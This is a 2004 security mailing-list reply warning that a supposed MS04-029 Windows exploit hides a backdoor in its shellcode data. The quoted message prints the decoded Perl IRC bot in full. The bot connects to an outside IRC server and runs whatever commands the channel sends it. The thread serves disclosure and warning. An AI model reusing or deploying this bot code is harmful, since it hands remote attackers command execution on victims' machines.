RE: New Remote Windows Exploit (MS04-029)

["Todd Towles" <toddtowles () brookshires com>]

Yep, Dave pointed that out really fast... 

> -----Original Message-----
> From: full-disclosure-admin () lists netsys com 
> [mailto:full-disclosure-admin () lists netsys com] On Behalf Of 
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: full-disclosure () lists netsys com
> Subject: Re: [Full-disclosure] New Remote Windows Exploit (MS04-029)
>
>
> Excellent exploit, I'm sure no one will spot that perl IRC 
> bot in there, nope no one will see that...
>
> (hint for the readers, try looking at the ascii out put of 
> the "char *shellcode_payload=" data, looks a little like the 
> following....)
>
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
>  $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
>  "\n"){print $sock
>  "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
>
> [/code]
>
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
>   http://www.bsrf.org.uk
>
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html